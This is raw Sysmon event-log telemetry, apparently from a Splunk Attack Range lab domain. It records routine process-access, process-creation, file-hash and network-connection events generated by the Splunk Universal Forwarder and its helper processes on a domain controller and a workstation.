08:09:50.247{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055383Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:50.247{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F8CE-60EB-097E-00000000CF01}9028C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055382Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:50.247{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F8CE-60EB-097E-00000000CF01}9028C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055381Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:50.232{466BC892-F8CE-60EB-097E-00000000CF01}9028C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000810761Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:51.886{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12E690345AFED92A943E48EE96AD3DC4,SHA256=F71CC96F34571B0C630A14CCD545673CA4DB2EB7340333F67ED5B043A35CA0C3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055421Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:51.850{466BC892-F8CF-60EB-0B7E-00000000CF01}96361072C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001055420Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:51.534{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2F476CA613D21FB54CA9029AAB75EE2,SHA256=81B78C50124218A9088C1F6D42CD1743F3CF53C9EC4C7C1B9CDAA8CEBC3A74B0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055419Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:51.534{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F8CF-60EB-0B7E-00000000CF01}9636C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055418Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:51.526{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055417Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:51.526{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055416Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:51.526{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055415Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:51.526{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055414Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:51.526{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F8CF-60EB-0B7E-00000000CF01}9636C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055413Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:51.526{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F8CF-60EB-0B7E-00000000CF01}9636C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055412Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:51.504{466BC892-F8CF-60EB-0B7E-00000000CF01}9636C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000810760Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:49.191{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57490-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001055411Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:51.235{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=74E98ACB171F6D80B038184CDAD8D925,SHA256=26E2ACFB1929FD1AFAB8CC2C51DC883F431D930532FFA1541DFF83EE93F05955,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055410Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:51.235{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8C12271B180A4BA35A56747AEED5934F,SHA256=1E6E62E9C4639856FEFD727D0A1DF3CBDDD7F76BA5BF37DAF8787C065933D5BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810762Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:52.902{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9734EB839923DA14BCE504B6EA3700AE,SHA256=69AFCAFFC5639C0557FBEDE38162967C167FA3D03448CCE0D15FE15EC7203288,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055433Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:44.758{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local62001-false10.0.1.12-8000- 10341000x80000000000000001055432Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:52.686{466BC892-F8D0-60EB-0C7E-00000000CF01}90368412C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001055431Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:52.551{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B3D241FB3BA648E7373B1DCFD377ACC,SHA256=F9C5CD9B3AC448BC05284900C579125AA02C68CF765CFF44ECBCDA783BBF6D9D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055430Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:52.518{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=74E98ACB171F6D80B038184CDAD8D925,SHA256=26E2ACFB1929FD1AFAB8CC2C51DC883F431D930532FFA1541DFF83EE93F05955,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055429Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:52.402{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F8D0-60EB-0C7E-00000000CF01}9036C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055428Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:52.402{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055427Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:52.402{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055426Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:52.402{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055425Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:52.402{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055424Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:52.402{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F8D0-60EB-0C7E-00000000CF01}9036C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055423Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:52.402{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F8D0-60EB-0C7E-00000000CF01}9036C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055422Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:52.382{466BC892-F8D0-60EB-0C7E-00000000CF01}9036C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000810763Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:53.964{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2CDA71C2D90D77B89DD8C5CA85FC6434,SHA256=0922B1E1BE77E833C44AE545F6B9CF2ADB815DA9A285A722F645D23F377C7F08,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x80000000000000001055450Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:53.702{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F8D1-60EB-0E7E-00000000CF01}4376C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055449Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 